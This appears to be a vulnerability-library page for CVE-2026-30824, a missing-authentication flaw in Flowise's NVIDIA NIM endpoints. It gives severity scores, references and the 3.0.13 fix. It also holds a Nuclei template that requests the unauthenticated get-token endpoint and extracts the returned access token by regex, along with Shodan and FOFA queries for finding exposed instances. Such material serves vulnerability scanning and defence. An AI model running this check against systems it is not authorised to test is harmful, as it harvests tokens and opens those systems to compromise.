/Vulnerability Library

Flowise - NVIDIA NIM Endpoints Missing Authentication

CVE-2026-30824
Verified

Description

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.

Severity

High

CVSS Score

8.6

Exploit Probability

8%

Affected Product

flowise

Published Date

April 15, 2026

Template Author

dhiyaneshdk

CVE-2026-30824.yaml
id: CVE-2026-30824

info:
  name: Flowise - NVIDIA NIM Endpoints Missing Authentication
  author: DhiyaneshDk
  severity: high
  description: |
    Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
  impact: |
    Unauthenticated attackers can access privileged container management and token generation, potentially leading to full system compromise.
  remediation: This issue has been patched in version 3.0.13
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454
    - https://nvd.nist.gov/vuln/detail/CVE-2026-30824
    - https://github.com/FlowiseAI/Flowise
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-30824
    epss-score: 0.07752
    epss-percentile: 0.91961
    cwe-id: CWE-306
  metadata:
    max-request: 2
    vendor: flowiseai
    product: flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2026,flowise,nvidia,nim,unauth,auth-bypass,token-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/nvidia-nim/get-token"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'access_token','token_type')"
        condition: and

    extractors:
      - type: regex
        name: access_token
        group: 1
        regex:
          - '"access_token"\s*:\s*"([^"]+)"'
        part: body
# digest: 4a0a00473045022100d40e4d7ab8327d0473fe2664304c817f914cbc84bf140f27bb94f135f6a8960102202e2ace5486d6f90a0faaa87e1c4c999b80914022c85672f45a92929068891f7f:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
cve-2026-30824
CWE ID:
cwe-306

References

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454https://nvd.nist.gov/vuln/detail/CVE-2026-30824https://github.com/FlowiseAI/Flowise

Remediation Steps

This issue has been patched in version 3.0.13